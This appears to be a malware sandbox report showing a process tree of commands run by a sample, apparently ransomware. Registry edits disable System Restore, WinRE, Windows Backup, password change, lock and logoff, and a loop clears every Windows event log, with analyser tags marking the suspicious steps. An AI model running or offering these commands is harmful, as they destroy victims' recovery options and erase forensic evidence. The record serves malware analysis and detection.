C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DebugChannel"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Media Center"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Disk/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Documents/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EFS/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EapHost/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-EventLog/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FMS/Operational"3⤵
-
